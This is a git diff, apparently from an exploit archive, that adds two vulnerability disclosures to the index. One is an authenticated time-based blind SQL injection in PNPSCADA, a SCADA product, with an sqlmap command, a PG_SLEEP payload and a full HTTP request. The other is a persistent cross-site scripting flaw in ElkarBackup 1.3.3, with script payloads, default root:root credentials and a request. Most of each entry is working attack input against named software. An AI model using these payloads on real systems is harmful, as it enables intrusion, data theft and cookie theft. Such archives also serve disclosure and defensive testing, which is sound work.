diff --git a/exploits/hardware/webapps/48757.txt b/exploits/hardware/webapps/48757.txt
new file mode 100644
index 000000000..0802fe7d1
--- /dev/null
+++ b/exploits/hardware/webapps/48757.txt
@@ -0,0 +1,57 @@
+# Exploit Title: PNPSCADA 2.200816204020 - 'interf' SQL Injection (Authenticated)
+# Google Dork: -
+# Date: 2020-08-17
+# Exploit Author: İsmail ERKEK
+# Vendor Homepage: http://wiki.pnpscada.com/forumHome.jsp
+# Version: 2.200816204020
+# Tested on: -
+
+
+1. Description:
+----------------------
+
+PNPSCADA  2.200816204020 allows SQL Injection via parameter 'interf' in
+/browse.jsp. Exploiting this issue could allow an attacker to compromise
+the application, access or modify data, or exploit latent vulnerabilities
+in the underlying database.
+
+2. Proof of Concept:
+----------------------
+
+In Burpsuite intercept the request from one of the affected pages with
+'interf' parameter and save it like fuel.req Then run SQLmap to extract the
+data from the database:
+
+sqlmap -r req-pnp-browse.txt --risk=3 --level=5 --dbs --random-agent
+
+3. Example payload:
+----------------------
+
+(time-based blind)
+
+memh=803509994960085058&searchStr=&replaceId=k1&multiple=yes&interf=115 AND
+6380=(SELECT 6380 FROM PG_SLEEP(5))&page=1&mselect=98831
+
+4. Burpsuite request:
+----------------------
+
+POST /browse.jsp HTTP/1.1
+Host: 127.0.0.1
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64;
+Trident/5.0)
+Connection: close
+Referer:
+http://127.0.0.1/browse.jsp?memh=2510775194362297745&interf=115&replaceId=k1&multiple=yes
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 93
+Cookie: wiki=; psl=7465737433; JSESSIONID=1ojrclvd94cpfebapnqebli37
+
+memh=803509994960085058&searchStr=*&replaceId=k1&multiple=yes&interf=115*&page=1&mselect=98831
+
+
+
+Best Regards.
+Ek alanı
\ No newline at end of file
diff --git a/exploits/php/webapps/48756.txt b/exploits/php/webapps/48756.txt
new file mode 100644
index 000000000..ca34b20d6
--- /dev/null
+++ b/exploits/php/webapps/48756.txt
@@ -0,0 +1,40 @@
+# Exploit Title: ElkarBackup 1.3.3 - Persistent Cross-Site Scripting
+# Date: 2020-08-14
+# Exploit Author: Enes Özeser
+# Vendor Homepage: https://www.elkarbackup.org/
+# Version: 1.3.3
+# Tested on: Linux
+
+1- Go to following url. >> http://(HOST)/elkarbackup/login
+2- Default username and password is root:root. We must know login credentials. 
+3- Go to "Jobs" and press "Add client" button.
+4- Write XSS payload in "Name" section.
+5- Press "Save" button.
+
+(( Executable XSS Payloads ))
+
+1- "><script>alert('XSS Confirmed!');</script>
+2- "><script>alert("XSS Confirmed!");</script>
+3- "><script>alert(document.cookie);</script>
+4- "><script>alert(document.domain);</script>
+
+
+(( REQUEST ))
+
+POST /elkarbackup/client/2 HTTP/1.1
+Host: (HOST)
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://(HOST)/elkarbackup/client/2
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 358
+Connection: close
+Cookie: PHPSESSID=dop3m1qj8c5octaxuasd21as2
+Upgrade-Insecure-Requests: 1
+
+Client%5Bname%5D=%22%3E%3Cscript%3Ealert%28%22XSS+Confirmed%21%22%29%3C%2Fscript%3E&
+Client%5Burl%5D=&Client%5Bquota%5D=-1&Client%5Bdescription%5D=&Client%5BisActive%5D=1&
+Client%5BmaxParallelJobs%5D=1&Client%5Bowner%5D=1&Client%5BsshArgs%5D=&Client%5BrsyncShortArgs%5D=&
+Client%5BrsyncLongArgs%5D=&Client%5B_token%5D=yrL8pXqx-sTVYhLQBpL523I-BOnSqoRyZnd5MUt2bfI
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 86e76fefb..493c5d106 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -42996,3 +42996,5 @@ id,file,description,date,author,type,platform,port
 48752,exploits/php/webapps/48752.txt,"Pharmacy Medical Store and Sale Point 1.0  - 'catid' SQL Injection",2020-08-18,"Moaaz Taha",webapps,php,
 48753,exploits/php/webapps/48753.txt,"Savsoft Quiz 5 - Stored Cross-Site Scripting",2020-08-18,"Mayur Parmar",webapps,php,
 48755,exploits/hardware/webapps/48755.txt,"Ruijie Networks Switch eWeb S29_RGOS 11.4 - Directory Traversal",2020-08-19,Tuygun,webapps,hardware,
+48756,exploits/php/webapps/48756.txt,"ElkarBackup 1.3.3 - Persistent Cross-Site Scripting",2020-08-20,"Enes Özeser",webapps,php,
+48757,exploits/hardware/webapps/48757.txt,"PNPSCADA 2.200816204020 - 'interf' SQL Injection (Authenticated)",2020-08-20,"İsmail ERKEK",webapps,hardware,
